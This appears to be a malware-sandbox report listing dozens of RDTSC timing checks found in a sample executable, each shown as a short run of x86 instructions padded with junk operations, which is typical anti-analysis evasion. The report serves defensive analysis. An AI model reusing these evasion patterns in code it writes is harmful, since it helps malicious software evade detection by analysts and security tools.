Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B214 second address: 92B23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848074392Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 jbe 00007F848074392Eh 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B23B second address: 92B23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B6B7 second address: 92B6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B6BD second address: 92B6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B6C3 second address: 92B6D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Bh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B829 second address: 92B82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B82D second address: 92B831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B831 second address: 92B839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B839 second address: 92B881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jg 00007F8480743926h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F8480743934h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e pushad 0x0000001f jmp 00007F8480743938h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B881 second address: 92B88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B88A second address: 92B88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92BCA1 second address: 92BCA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92BCA5 second address: 92BCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92BCAB second address: 92BCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92BCB1 second address: 92BCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92BCB7 second address: 92BCBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92BCBB second address: 92BCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F848074392Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92F308 second address: 92F311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92EBC6 second address: 92EBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92EE8A second address: 92EE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92EE94 second address: 92EE98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92EFE1 second address: 92F009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007F848150386Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8481503871h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92F009 second address: 92F00F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92F00F second address: 92F022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F848150386Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92F022 second address: 92F02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F8480743932h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9314E4 second address: 9314E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9314E9 second address: 931507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743938h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 931507 second address: 931512 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 932F8C second address: 932F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 936EF5 second address: 936F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F848150386Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937172 second address: 937176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93776D second address: 937775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937775 second address: 93779A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F8480743939h 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93779A second address: 9377A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9377A0 second address: 9377A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C3E7 second address: 93C3FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F8481503866h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C547 second address: 93C551 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C551 second address: 93C559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C559 second address: 93C55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C6DD second address: 93C6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C6E1 second address: 93C6E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C9AC second address: 93C9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C9B0 second address: 93C9BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93CB25 second address: 93CB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503878h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93CB47 second address: 93CB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F8480743940h 0x0000000b popad 0x0000000c jc 00007F848074393Eh 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 896756 second address: 89675B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89675B second address: 8967B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480743938h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8480743937h 0x00000014 jns 00007F8480743926h 0x0000001a jmp 00007F8480743932h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8967B1 second address: 8967BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8967BB second address: 8967C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8967C3 second address: 8967F0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503872h 0x00000008 pushad 0x00000009 jmp 00007F8481503876h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9410A8 second address: 9410B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8480743926h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9410B3 second address: 9410B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9410B9 second address: 9410BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9410BF second address: 9410DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503870h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 941677 second address: 94168E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743931h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94168E second address: 9416C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F8481503872h 0x00000011 push edi 0x00000012 jmp 00007F8481503879h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948209 second address: 94820F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9483E4 second address: 9483F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9483F2 second address: 948406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F848074392Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948980 second address: 948988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948988 second address: 94898D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94898D second address: 9489B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F848150386Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9489B4 second address: 9489BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948CBA second address: 948CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F8481503872h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948CD1 second address: 948CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8480743926h 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F8480743926h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8480743934h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94958C second address: 9495CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F848150386Ah 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8481503874h 0x00000016 jmp 00007F8481503874h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9495CA second address: 9495CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94985A second address: 94985E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949B56 second address: 949B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949B5A second address: 949B66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8481503866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949DF5 second address: 949DFF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949DFF second address: 949E0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F8481503866h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949E0A second address: 949E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007F848074392Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95023B second address: 95023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954365 second address: 9543A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F848074392Ah 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007F848074392Eh 0x00000018 jo 00007F8480743926h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007F848074393Bh 0x00000029 jmp 00007F8480743935h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9543A3 second address: 9543A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9543A9 second address: 9543AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953503 second address: 95351E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jns 00007F8481503866h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jnc 00007F8481503866h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95351E second address: 953526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953526 second address: 95352A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953984 second address: 953992 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953992 second address: 953996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953996 second address: 95399A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953AE6 second address: 953B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F8481503879h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e jp 00007F848150386Ch 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F848150386Eh 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953B21 second address: 953B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953C83 second address: 953C8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95C2E6 second address: 95C311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8480743933h 0x0000000a jnl 00007F8480743926h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F8480743926h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95C311 second address: 95C315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95C315 second address: 95C319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A673 second address: 95A677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A677 second address: 95A680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A680 second address: 95A68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A68A second address: 95A68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95ABC8 second address: 95ABE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503872h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95ABE6 second address: 95ABFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F848074392Ah 0x0000000a popad 0x0000000b jc 00007F848074392Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95AE97 second address: 95AE9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95B036 second address: 95B03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95B1C2 second address: 95B1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F848150386Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95B1D8 second address: 95B1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F8480743926h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95BA75 second address: 95BA90 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F848150386Dh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F8481503866h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
